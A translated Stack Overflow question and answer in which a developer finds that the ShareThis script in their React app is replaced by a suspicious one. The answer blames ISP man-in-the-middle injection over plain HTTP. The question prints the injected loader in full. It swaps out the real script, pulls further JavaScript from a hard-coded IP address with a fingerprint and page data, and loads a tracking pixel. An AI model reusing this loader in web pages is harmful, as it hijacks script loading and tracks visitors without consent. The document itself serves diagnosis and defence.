const script = document.createElement("script");
script.src =
"//platform-api.sharethis.com/js/sharethis.js#property=45454545&product=sop?r=" +
new Date().getTime();
script.async = true;
script.id = "shareThisId";
document.body.appendChild(script);
我将这个脚本包含在我的 React 组件中。这是我从我的 sharethis 帐户获得的脚本。出于某种原因,我的页面中没有共享按钮。当我检查正在运行的脚本是什么时,是这个。
!function() {
var a = "/js/sharethis.js"
, r = null
, e = document.getElementsByTagName("script")
, i = e.length
, n = null
, t = Date.now()
, s = null
, o = 0;
for ("/" === a.substring(0, 1) && (a = a.substring(1)),
o = 0; o < i; o += 1)
if (void 0 !== e[o].src && null !== e[o].src && e[o].src.indexOf(a) > -1) {
n = o,
r = e[o];
break
}
void 0 !== r && null !== r || (r = document.getElementsByTagName("script")[0]),
s = r.src.indexOf("?") > -1 ? r.src + "&cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag" : r.src + "?cb=" + t.toString() + "&fingerprint=c2VwLW5vLXJlZGlyZWN0&onIframeFlag";
try {
if (void 0 === window.sarazasarazaNoti || null === window.sarazasarazaNoti || window.sarazasarazaNoti === Array && window.sarazasarazaNoti.indexOf(r.src) < 0) {
void 0 !== window.sarazasarazaNoti && null !== window.sarazasarazaNoti || (window.sarazasarazaNoti = new Array),
window.sarazasarazaNoti.push(r.src);
var c = r.parentNode
, d = r;
if (r.async || r.defer || null !== n && n !== e.length - 1) {
var w = document.createElement("script");
w.src = s,
c.replaceChild(w, d)
} else
document.write("<script type='text/javascript' src=" + s + "><\/script>"),
c.removeChild(d)
}
var a1 = "117.254.84.212";
var a2 = "3000";
if (window === window.top && (void 0 === window.sarazasaraza || null === window.sarazasaraza || !window.sarazasaraza)) {
window.sarazasaraza = !0;
var l = a1 + ":" + a2 + "/getjs?nadipdata=" + JSON.stringify("%7B%22url%22:%22%2Fjs%2Fsharethis.js%22%2C%22referer%22:%22http:%2F%2Fm.ragalahari.com%2Factress%2F164324%2Fnilofer-haidry-sutraa-fashion-exhibition-curtain-raiser-photos.aspx%22%2C%22host%22:%22platform-api.sharethis.com%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D") + "&screenheight=" + screen.height + "&screenwidth=" + screen.width + "&tm=" + (new Date).getTime() + "&lib=true&fingerprint=c2VwLW5vLXJlZGlyZWN0";
!function(a, r, e, i, n, t, s) {
t = r.createElement(e),
s = r.getElementsByTagName(e)[0],
t.async = !0,
t.src = i,
s.parentNode.insertBefore(t, s)
}(window, document, "script", "//" + l)
}
var imgtag = document.createElement('img');
imgtag.height = '1';
imgtag.width = '1';
imgtag.style = 'border-style:none;';
imgtag.alt = '';
imgtag.src = '//' + a1 + ":" + a2 + "/pixel/1x1.png"
} catch (a) {}
}()
这不是实际在实时服务器中运行的脚本。只有当我从本地主机运行它时,才会发生这种情况。 运行的脚本似乎很可疑。谁能告诉我为什么会这样?
最佳答案
很遗憾,这是您的互联网服务提供商 BSNL它将 JavaScript 代码注入(inject)到通过非 HTTPS 连接提供的资源中。
确保您的网站和所有外部资源都是通过 HTTPS 获取的,这样您就可以暂时解决这个问题。最终是 ISP 执行 MITM 恶意软件注入(inject)导致了问题。
关于这个 here 有更多讨论
关于javascript - 分享这个脚本被另一个脚本替换,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/51740476/